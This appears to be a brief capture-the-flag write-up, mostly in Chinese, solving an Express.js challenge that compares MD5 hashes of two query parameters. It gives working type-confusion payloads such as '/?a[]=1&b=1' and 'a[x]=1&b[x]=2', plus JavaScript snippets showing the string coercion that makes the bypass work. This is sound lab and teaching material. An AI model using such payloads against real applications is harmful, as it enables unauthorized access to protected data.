1. var express = require('express');
    2. var router = express.Router();
    3. var crypto = require('crypto');
    5. function md5(s) {
    6.   return crypto.createHash('md5')
    7.     .update(s)
    8.     .digest('hex');
    9. }
    11. /* GET home page. */
    12. router.get('/', function(req, res, next) {
    13.   res.type('html');
    14.   var flag='xxxxxxx';
    15.   var a = req.query.a;
    16.   var b = req.query.b;
    17.   if(a && b && a.length===b.length && a!==b && md5(a+flag)===md5(b+flag)){
    18.       res.end(flag);
    19.   }else{
    20.       res.render('index',{ msg: 'tql'});
    21.   }
    23. });
    25. module.exports = router;

    和 PHP 一样,数组绕过即可

    1. /?a[]=1&b=1

    image.png

    发现这样更易于理解
    payload: a[x]=1&b[x]=2
    运行一下代码

    1. a={'x':'1'}
    2. b={'x':'2'}
    4. console.log(a+"flag{xxx}")
    5. console.log(b+"flag{xxx}")
    7. a=[1]
    8. b=[2]
    10. console.log(a+"flag{xxx}")
    11. console.log(b+"flag{xxx}")

    image.png